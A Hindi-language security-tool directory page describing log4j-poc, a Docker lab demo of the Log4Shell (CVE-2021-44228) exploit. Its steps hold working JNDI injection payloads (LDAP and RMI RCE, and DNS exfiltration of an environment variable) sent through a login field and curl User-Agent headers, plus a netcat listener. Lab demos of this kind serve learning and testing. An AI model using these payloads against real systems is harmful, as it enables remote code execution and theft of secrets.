Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
log4j-poc — CVE-2021-44228 Log4Shell के लिए एक Docker आधारित LDAP RCE एक्सप्लॉइट डेमो | Kitploit
उपकरण/GitHubGitHub/cyberxml/log4j-poc
पेलोड जनरेशनभेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षालैब और अभ्यास
GitHubcyberxml/log4j-poc

log4j-poc

CVE-2021-44228 Log4Shell के लिए एक Docker आधारित LDAP RCE एक्सप्लॉइट डेमो

रिपॉजिटरी देखें
72333 साल पहलेKitploit द्वारा समीक्षित

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

log4j-poc

CVE-2021-44228 Log4Shell के लिए एक LDAP RCE एक्सप्लॉइट

विवरण

पोर्ट 8080 पर डेमो Tomcat 8 सर्वर पर एक कमजोर ऐप (log4shell) तैनात है और सर्वर उपयोगकर्ता-एजेंट हमलों के माध्यम से भी कमजोर है।

इस डेमो में रिमोट एक्सप्लॉइट ऐप https://github.com/kozmer/log4j-shell-poc पर पाए जाने वाले पर आधारित है।

इस डेमो टॉमकैट सर्वर (Tomcat 8.5.3, Java 1.8.0u51) को लॉगिंग के लिए Log4J2 का उपयोग करने के लिए पुन: कॉन्फ़िगर किया गया है - एक गैर-मानक कॉन्फ़िगरेशन।

पोर्ट 8888 पर एक नया Bitnami सर्वर अब उपलब्ध है। इसे भी Log4J2 लॉगिंग के लिए कॉन्फ़िगर किया गया है और यह Tomcat 9.0.55 और OpenJDK 11.0.13 चला रहा है।

Tomcat 9 / Java 11 सर्वर के खिलाफ RMI एक्सप्लॉइट का वर्णन यहां किया गया है: https://www.veracode.com/blog/research/exploiting-jndi-injections-java (Jan 3, 2019) Michael Stepankin द्वारा

डिटेक्शन स्क्रिप्ट उपयोगकर्ता-एजेंट कमजोरियों की जांच करेगी और यह यहां से है: https://gist.github.com/byt3bl33d3r/46661bc206d323e6770907d259e009b6

पूर्वापेक्षाएँ

इस कोड के लिए Docker और Docker Compose की आवश्यकता है।

स्थापना

root@kitploit:~
git clone https://github.com/cyberxml/log4j-poc
cd log4j-poc
# edit docker-compose.yml to addjust the environment variables as needed.
#   POC_ADDR is the address of the cve-poc container
#   LISTENER_ADDR is the address of the 'nc' listener e.g. the docker host
# The listener IP address is the address of the machine on which you will run the netcat 'nc' listener
# This can be the local IP of the docker hostmachine.
docker-compose build

वेब ऐप अटैक डेमो चलाएँ

  1. पहले टर्मिनल में अपना डॉकर लिसनर सेट करें
    1. nc -lv 10.10.10.31 9001
  2. दूसरे टर्मिनल में डॉकर कंटेनर शुरू करें
    1. docker-compose up
  3. पोर्ट 8080 पर वेब ऐप पर जाएँ
    1. http://10.10.10.31:8080/log4shell पर जाएँ
      1. उपयोगकर्ता नाम दर्ज करें: admin
      2. पासवर्ड दर्ज करें: password
      3. "login" बटन चुनें
      4. स्वागत स्क्रीन देखें
    2. http://10.10.10.31:8080/log4shell पर लॉगिन पर वापस जाएँ
      1. उपयोगकर्ता नाम दर्ज करें ${jndi:ldap://172.16.238.11:1389/a}
      2. "login" बटन चुनें
      3. अपने nc लिसनर पर कनेक्शन की जाँच करें

उपयोगकर्ता एजेंट अटैक डेमो चलाएँ

  1. पहले टर्मिनल में अपना डॉकर लिसनर सेट करें
    1. nc -lv 10.10.10.31 9001
  2. दूसरे टर्मिनल में डॉकर कंटेनर शुरू करें
    1. docker-compose up
  3. तीसरे टर्मिनल में, निम्नलिखित चलाएँ। दूसरा IP डॉकर होस्ट है
    1. curl -A "\${jndi:ldap://172.16.238.11:1389/a}" http://10.10.10.31:8080/log4shell

हालिया Java 11 संस्करण पर DNS एक्सफिल डेमो चलाएँ

  1. एक टर्मिनल में डॉकर कंटेनर शुरू करें
    1. docker-compose up
  2. दूसरे टर्मिनल में, निम्नलिखित चलाएँ। IP डॉकर होस्ट का आईपी पता है
    1. curl -A "\${jndi:dns://10.10.10.31/\${env:POC_PASSWORD}}" http://10.10.10.31:8888/log4shell/
  3. कमजोर वेब सर्वर दिए गए IP पर TXT लुकअप करने का प्रयास करेगा। log4j-dns_exfil.pcap देखें।

हालिया Java 11 संस्करण पर RMI RCE डेमो चलाएँ

मुझे पिंग टार्गेट के लिए कमांड लाइन आर्ग में समस्या हो रही है। इसलिए आपको स्वयं कंपाइल करना होगा।

कंपाइल करें

  1. एक टर्मिनल में डॉकर कंटेनर शुरू करें
    1. docker-compose up
  2. दूसरे टर्मिनल में, cve-poc में लॉगिन करें
    1. docker exec -it log4j-poc_cve-poc_1 /bin/bash
  3. चल रहे RMIServerPOC इंस्टेंस को मारें
  4. rmi-poc डायरेक्टरी में बदलें
    1. cd /home/user/rmi-poc
  5. अपने पिंग टार्गेट में 10.10.10.31 बदलने के लिए RMIServerPOC.java संपादित करें
  6. पुनः कंपाइल करें
    1. javac -cp catalina.jar:. RMIServerPOC.java
  7. सर्वर चलाएँ
    1. javac -cp catalina.jar:. RMIServerPOC 127.0.0.1

RMI RCE डेमो चलाएँ

  1. एक टर्मिनल में डॉकर कंटेनर शुरू करें
    1. docker-compose up
  2. दूसरे टर्मिनल में, निम्नलिखित चलाएँ। IP डॉकर होस्ट का आईपी पता है
    1. curl -A "\${jndi:rmi://172.16.238.11:1097/Object}" http://10.10.10.31:8888/
  3. कमजोर वेब सर्वर RMI सर्वर से एक सीरियलाइज़्ड मैलिशियस क्लास डाउनलोड करेगा जो पहले से Tomcat वातावरण में मौजूद है।
  4. यह कंपाइल अनुभाग में परिभाषित IP पते को पिंग करेगा।

UA कमजोरी का पता लगाएँ

  1. cd scripts
  2. python3 log4j_rce_check.py http://10.10.10.31:8080/log4shell --attacker-host 10.10.10.31:11389 --timeout=2
  3. आपको प्रक्रिया को मारना होगा, अभी तक यह सुनिश्चित नहीं है कि यह क्यों अटकता है।
टूल डाउनलोड करें